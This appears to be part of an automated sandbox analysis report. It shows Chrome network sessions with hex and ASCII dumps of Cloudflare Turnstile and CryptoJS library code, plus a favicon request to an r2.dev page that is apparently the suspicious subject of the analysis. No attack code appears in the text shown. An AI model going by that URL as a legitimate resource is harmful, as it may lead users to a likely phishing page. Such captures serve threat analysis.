                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                                                                                                                                                                        Data Ascii: var Y="0/0";function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 6b 28 4f 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 5f 2c 73 3d 6b 28 43 72 2c 28 5f 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d
                                                                                                                                                                                                        Data Ascii: ate===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=k(Or,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),_,s=k(Cr,(_=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!=
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 72 2c 61 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 5f 3d 5b 6e 75 6c 6c 5d 3b 5f 2e 70 75 73 68 2e 61 70 70 6c 79 28 5f 2c 75 29 3b 76 61 72 20 73 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 5f 29 2c 66 3d 6e 65 77 20 73 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 66 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 66 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63
                                                                                                                                                                                                        Data Ascii: r,a){return Be()?Se=Reflect.construct:Se=function(c,u,g){var _=[null];_.push.apply(_,u);var s=Function.bind.apply(c,_),f=new s;return g&&J(f,g.prototype),f},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:func
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69
                                                                                                                                                                                                        Data Ascii: function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Et(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;i
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 62 74 28 72 29 2c 73 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 66 6c 65 78 22 2c 73 2e 73 74 79 6c 65 2e 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3d 22 63 65 6e 74 65 72 22 2c 73 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 73 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 73 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e
                                                                                                                                                                                                        Data Ascii: s.style.height=bt(r),s.style.display="flex",s.style.justifyContent="center",s.style.position="relative",s.style.zIndex="21474836420",s.style.backgroundColor="#ffffff",s.style.borderRadius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        30192.168.2.549774104.17.24.144436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:15 GMT
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                                                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 123267
                                                                                                                                                                                                        Expires: Wed, 20 Aug 2025 16:16:15 GMT
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFrKkfHokm8RM77J8AnDHbjLeT6rfXoor2Oi9phjlMDIbzjAFzJLGUHblYU%2Ba%2FfjpgfhJFLDPH2OIS0Y7%2FQRg7zQwCPIpEFSwQvzpTMF3fJ%2Fowd2NqqXiUY9vd4Vst2ty%2FrRZMiR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615936c478cdc-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                        Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                                                                                                                                                        Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                                                                                                                                                        Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                                                                                                                                                        Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                                                                                                                                                        Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                                                                                                                                                        Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                                                                                                                                                        Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                                                                                                                                                        Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                                                                                                                                                        Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                                                                                                                                                        2024-08-30 16:16:15 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                                                                                                                                                        Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        31192.168.2.549769104.18.2.354436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:16 UTC685OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                        Host: pub-e1c6f3d85d51402790227684363ac52c.r2.dev
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:16 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:16 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 27150
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615967e188cd4-EWR
